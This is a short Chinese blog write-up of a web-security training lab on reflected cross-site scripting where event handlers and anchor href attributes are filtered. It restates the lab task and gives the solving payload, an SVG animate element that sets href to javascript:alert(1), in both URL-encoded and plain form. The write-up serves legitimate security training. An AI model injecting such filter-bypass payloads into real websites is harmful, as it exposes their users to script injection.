Lab: Reflected XSS with event handlers and href attributes blocked EXPERT LAB:反射型 XSS 事件处理程序和href属性被阻止

靶场内容

该实验室包含一个带有一些白名单标签的反射型 XSS漏洞,但所有事件和锚点href属性都被阻止。

要解决该实验室问题,请执行跨站点脚本攻击,该攻击会注入一个向量,单击该向量时会调用该alert函数。

请注意,您需要使用“点击”一词来标记您的矢量,以诱导模拟实验室用户点击您的矢量。例如:<a href="">Click me</a>

漏洞分析

在URL中插入脚本:

/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E

具体内容如下:

/?search=<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>
posted @ 2021-08-25 09:35  Zeker62  阅读(89)  评论(1编辑  收藏  举报